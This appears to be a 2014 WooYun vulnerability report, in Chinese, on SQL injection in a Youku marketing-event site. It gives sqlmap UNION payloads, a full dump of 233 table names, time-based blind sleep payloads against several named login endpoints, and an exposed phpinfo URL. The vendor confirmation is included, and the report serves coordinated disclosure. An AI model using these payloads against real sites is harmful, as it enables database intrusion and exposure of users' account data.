优酷某站SQL注入点一枚

漏洞详情

披露状态:

2014-03-01: 细节已通知厂商并且等待厂商处理中
2014-03-01: 厂商已经确认,细节仅向厂商公开
2014-03-11: 细节向核心白帽子及相关领域专家公开
2014-03-21: 细节向普通白帽子公开
2014-03-31: 细节向实习白帽子公开
2014-04-15: 细节向公众公开

简要描述:

优酷某活动站注入,大量参加活动的用户帐号信息泄露。
== 叫你们想占便宜

详细说明:

注入点:events.youku.com/2011/pepsihappyness/api/?act=my_ecards&page=1&pagesize=4&pageslists=%23ecards_pageslists&pagesturn=%23ecards_pagesturn&url=api/%3Fact%3Dmy_ecards%26uid%3D34853&uid=1

注入参数:uid



sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: uid
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: act=my_ecards&page=1&pagesize=4&pageslists=#ecards_pageslists&pagesturn=#ecards_pagesturn&url=api/?act=my_ecards&uid=34853&uid=1 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,121,107,58),CHAR(85,73,87,75,89,104,111,105,87,85),CHAR(58,114,106,121,58)), NULL, NULL#
---

available databases [3]:
[*] db_events
[*] information_schema
[*] test

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: uid
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: act=my_ecards&page=1&pagesize=4&pageslists=#ecards_pageslists&pagesturn=#ecards_pagesturn&url=api/?act=my_ecards&uid=34853&uid=1 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,121,107,58),CHAR(85,73,87,75,89,104,111,105,87,85),CHAR(58,114,106,121,58)), NULL, NULL#
---

Database: db_events
[233 tables]
+--------------------------+
| 7up_user |
| adidas_2010_football |
| adidas_2011_tvc_info |
| adidas_comments |
| aveo_clicks |
| aveo_comments |
| aveo_users |
| bosideng_1024_users |
| bosideng_code |
| bosideng_fake_users |
| bosideng_photos |
| bosideng_users |
| bosideng_video_vote_logs |
| bosideng_videos |
| bosideng_vote_logs |
| bsd_kpi_email |
| bsd_kpi_user |
| bsd_rt_log |
| bsd_user |
| bugles_videos |
| casesharing_2013 |
| cgirl2014_awards |
| chengxin_news |
| chery_comments |
| chery_photo_vote_logs |
| chery_photos |
| chery_users |
| chery_video_vote_logs |
| chery_videos |
| cityshow_comment |
| cityshow_data |
| cityshow_member |
| clear_game_log |
| clear_log |
| clear_rt_log |
| clear_users |
| crowneplaza_register |
| deyi_tickets_users |
| dove_user |
| dove_video |
| etam_comment |
| etam_txt |
| fiesta_2011_guestbook |
| fm_dream |
| fm_kpi_member |
| fm_number |
| fm_number_bak |
| fm_number_t |
| fm_number_test |
| fm_support_log |
| fm_user |
| fm_vote_log |
| fm_work |
| global_accounts |
| global_china |
| global_files |
| global_minisites |
| global_testing |
| global_units |
| greetingcard_params |
| gucci_comments |
| gucci_rt_logs |
| gucci_users |
| hkdl_users |
| ht_config |
| ht_guest |
| ht_user |
| htc_config |
| hvsop2013_awards |
| hvsop_comments |
| hvsop_live_email |
| hvsop_resumes |
| hvsop_users |
| hvsop_videos |
| hvsop_vote_logs |
| icedew_videos |
| jasmine_comments |
| jw2ask_marked |
| jw2ask_plans |
| jw2ask_questions |
| jw2ask_same_q |
| jw2ask_top30_grade_logs |
| kohler_comments |
| kohler_mm_awards |
| kohler_photo_vote_logs |
| kohler_photos |
| kohler_prize_logs |
| kohler_users |
| kohler_video_vote_logs |
| kohler_videos |
| lee_moment_photos |
| lee_moment_votelog |
| levis_data |
| levis_logs |
| levis_win |
| loreal_flash_ad |
| mabelline_users |
| mamonde_2013_videos |
| market_huanzhu_votes |
| marketing_apply_info |
| marketing_darenxiu |
| marketing_fashion |
| marketing_jianjiancao |
| marketing_kfc_avatar |
| marketing_kfc_cms |
| marketing_laifushi |
| marketing_upload_info |
| mql_award |
| mql_seckill |
| mql_seckill_bak |
| mql_seckill_log |
| nikegz_comments |
| nikegz_image |
| nikegz_pks |
| nikegz_videos |
| nivea_answer_logs |
| nivea_awards |
| nivea_final_awards |
| nivea_photos |
| nivea_question |
| nivea_users |
| nivea_vote_logs |
| onstar_regist |
| onstar_video |
| oreo_images |
| oreo_videos |
| pepsi_comments |
| pepsi_ecards |
| pepsi_media |
| pepsi_users |
| pepsi_videos |
| pepsi_vote_logs |
| pepsicny_videos |
| qingyang_comment |
| qingyang_videos |
| remyvsop_banner |
| remyvsop_comment |
| remyvsop_mobile |
| remyvsop_news |
| remyvsop_register |
| remyvsop_teams |
| remyvsop_videos |
| ricola_pincode |
| ricola_tickets |
| roewe_comment |
| roewe_config |
| roewe_guess |
| roewe_player |
| roewe_user |
| scj_users |
| sprite_users |
| sprite_videos |
| superb_comments |
| superb_comments_bak |
| superb_videos |
| sww_2011_users |
| sww_2011_videos |
| unit_cachedata |
| unit_comments |
| unit_misc |
| unit_news |
| unit_users |
| unit_videos |
| unit_visitors |
| unit_voting |
| vichy2013_awards |
| vichy2013_winners |
| videos_bak |
| vsop_email |
| vsop_live_mobile |
| vsop_loop_videos |
| vsop_lyp |
| vsop_users |
| vsop_videos |
| vsop_vote_email |
| wtcc_2011_guestbook |
| wtcc_2011_shots |
| wtcc_2011_users |
| wzmt_awards |
| wzmt_awards_bak |
| wzmt_seckill |
| wzmt_seckill_log |
| z_acer_user |
| z_bwnzb_user |
| z_eleven_user |
| z_fanta |
| z_fanta_email |
| z_ferrari |
| z_ferrero_user |
| z_huggies |
| z_huggies_comments |
| z_k3 |
| z_k3_user |
| z_k3_v |
| z_lenscrafter_pic |
| z_lenscrafter_user |
| z_loreal |
| z_market_disney |
| z_market_topchef |
| z_proya2011_100 |
| z_proya2011_code |
| z_proya2011_mblog |
| z_proya2011_pic |
| z_proya2011_user |
| z_proya2011_v2_pic |
| z_proya2011_v2_user |
| z_proya_pic |
| z_proya_user |
| z_remyclub_comment |
| z_remyclub_user |
| z_riich_user |
| z_sdeer_user |
| z_sepb_user |
| z_sgm15th |
| z_volvo |
| z_wp_code |
| z_young |
| z_z_comment |
| z_z_contact |
| z_z_contact2 |
| z_z_email |
| z_z_img |
| z_z_luck |
| z_z_module_luck |
| z_z_p |
| z_z_txt |
| z_z_txt_vote |
| z_z_v |
| z_z_vote |
| z_z_vote_id |
| z_z_vote_ip |
| zhijue_users |
| zqbb_videos |
+--------------------------+





呵呵,还有几个post注入点,但是用常用工具无法注出结果,但通过时间延迟可以确定存在。



http://events.youku.com/bwnzb/api/_login.php

uname=/*'XOR(if(now()%3dsysdate()%2csleep(1)%2c0))OR'*/&upass=e



http://events.youku.com/bwnzb/phase-2/api/_login.php

uname=/*'XOR(if(now()%3dsysdate()%2csleep(1)%2c0))OR'*/&upass=e



http://events.youku.com/familymart/api/?q=ajax/doSupport

type=(select(sleep(3))v)&work_id=24526

或者type=test&work_id=(select(sleep(3))v)



附送一个phpinfo

http://events.youku.com/2010/wtcc/phpinfo.php

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: uid
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: act=my_ecards&page=1&pagesize=4&pageslists=#ecards_pageslists&pagesturn=#ecards_pagesturn&url=api/?act=my_ecards&uid=34853&uid=1 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,121,107,58),CHAR(85,73,87,75,89,104,111,105,87,85),CHAR(58,114,106,121,58)), NULL, NULL#
---

available databases [3]:
[*] db_events
[*] information_schema
[*] test

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: uid
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: act=my_ecards&page=1&pagesize=4&pageslists=#ecards_pageslists&pagesturn=#ecards_pagesturn&url=api/?act=my_ecards&uid=34853&uid=1 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,121,107,58),CHAR(85,73,87,75,89,104,111,105,87,85),CHAR(58,114,106,121,58)), NULL, NULL#
---

Database: db_events
[233 tables]
+--------------------------+
| 7up_user |
| adidas_2010_football |
| adidas_2011_tvc_info |
| adidas_comments |
| aveo_clicks |
| aveo_comments |
| aveo_users |
| bosideng_1024_users |
| bosideng_code |
| bosideng_fake_users |
| bosideng_photos |
| bosideng_users |
| bosideng_video_vote_logs |
| bosideng_videos |
| bosideng_vote_logs |
| bsd_kpi_email |
| bsd_kpi_user |
| bsd_rt_log |
| bsd_user |
| bugles_videos |
| casesharing_2013 |
| cgirl2014_awards |
| chengxin_news |
| chery_comments |
| chery_photo_vote_logs |
| chery_photos |
| chery_users |
| chery_video_vote_logs |
| chery_videos |
| cityshow_comment |
| cityshow_data |
| cityshow_member |
| clear_game_log |
| clear_log |
| clear_rt_log |
| clear_users |
| crowneplaza_register |
| deyi_tickets_users |
| dove_user |
| dove_video |
| etam_comment |
| etam_txt |
| fiesta_2011_guestbook |
| fm_dream |
| fm_kpi_member |
| fm_number |
| fm_number_bak |
| fm_number_t |
| fm_number_test |
| fm_support_log |
| fm_user |
| fm_vote_log |
| fm_work |
| global_accounts |
| global_china |
| global_files |
| global_minisites |
| global_testing |
| global_units |
| greetingcard_params |
| gucci_comments |
| gucci_rt_logs |
| gucci_users |
| hkdl_users |
| ht_config |
| ht_guest |
| ht_user |
| htc_config |
| hvsop2013_awards |
| hvsop_comments |
| hvsop_live_email |
| hvsop_resumes |
| hvsop_users |
| hvsop_videos |
| hvsop_vote_logs |
| icedew_videos |
| jasmine_comments |
| jw2ask_marked |
| jw2ask_plans |
| jw2ask_questions |
| jw2ask_same_q |
| jw2ask_top30_grade_logs |
| kohler_comments |
| kohler_mm_awards |
| kohler_photo_vote_logs |
| kohler_photos |
| kohler_prize_logs |
| kohler_users |
| kohler_video_vote_logs |
| kohler_videos |
| lee_moment_photos |
| lee_moment_votelog |
| levis_data |
| levis_logs |
| levis_win |
| loreal_flash_ad |
| mabelline_users |
| mamonde_2013_videos |
| market_huanzhu_votes |
| marketing_apply_info |
| marketing_darenxiu |
| marketing_fashion |
| marketing_jianjiancao |
| marketing_kfc_avatar |
| marketing_kfc_cms |
| marketing_laifushi |
| marketing_upload_info |
| mql_award |
| mql_seckill |
| mql_seckill_bak |
| mql_seckill_log |
| nikegz_comments |
| nikegz_image |
| nikegz_pks |
| nikegz_videos |
| nivea_answer_logs |
| nivea_awards |
| nivea_final_awards |
| nivea_photos |
| nivea_question |
| nivea_users |
| nivea_vote_logs |
| onstar_regist |
| onstar_video |
| oreo_images |
| oreo_videos |
| pepsi_comments |
| pepsi_ecards |
| pepsi_media |
| pepsi_users |
| pepsi_videos |
| pepsi_vote_logs |
| pepsicny_videos |
| qingyang_comment |
| qingyang_videos |
| remyvsop_banner |
| remyvsop_comment |
| remyvsop_mobile |
| remyvsop_news |
| remyvsop_register |
| remyvsop_teams |
| remyvsop_videos |
| ricola_pincode |
| ricola_tickets |
| roewe_comment |
| roewe_config |
| roewe_guess |
| roewe_player |
| roewe_user |
| scj_users |
| sprite_users |
| sprite_videos |
| superb_comments |
| superb_comments_bak |
| superb_videos |
| sww_2011_users |
| sww_2011_videos |
| unit_cachedata |
| unit_comments |
| unit_misc |
| unit_news |
| unit_users |
| unit_videos |
| unit_visitors |
| unit_voting |
| vichy2013_awards |
| vichy2013_winners |
| videos_bak |
| vsop_email |
| vsop_live_mobile |
| vsop_loop_videos |
| vsop_lyp |
| vsop_users |
| vsop_videos |
| vsop_vote_email |
| wtcc_2011_guestbook |
| wtcc_2011_shots |
| wtcc_2011_users |
| wzmt_awards |
| wzmt_awards_bak |
| wzmt_seckill |
| wzmt_seckill_log |
| z_acer_user |
| z_bwnzb_user |
| z_eleven_user |
| z_fanta |
| z_fanta_email |
| z_ferrari |
| z_ferrero_user |
| z_huggies |
| z_huggies_comments |
| z_k3 |
| z_k3_user |
| z_k3_v |
| z_lenscrafter_pic |
| z_lenscrafter_user |
| z_loreal |
| z_market_disney |
| z_market_topchef |
| z_proya2011_100 |
| z_proya2011_code |
| z_proya2011_mblog |
| z_proya2011_pic |
| z_proya2011_user |
| z_proya2011_v2_pic |
| z_proya2011_v2_user |
| z_proya_pic |
| z_proya_user |
| z_remyclub_comment |
| z_remyclub_user |
| z_riich_user |
| z_sdeer_user |
| z_sepb_user |
| z_sgm15th |
| z_volvo |
| z_wp_code |
| z_young |
| z_z_comment |
| z_z_contact |
| z_z_contact2 |
| z_z_email |
| z_z_img |
| z_z_luck |
| z_z_module_luck |
| z_z_p |
| z_z_txt |
| z_z_txt_vote |
| z_z_v |
| z_z_vote |
| z_z_vote_id |
| z_z_vote_ip |
| zhijue_users |
| zqbb_videos |
+--------------------------+

修复方案:

版权声明:转载请注明来源 Mr .LZH@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-03-01 20:08

厂商回复:

多谢提醒,马上修复

最新状态:

暂无


漏洞评价: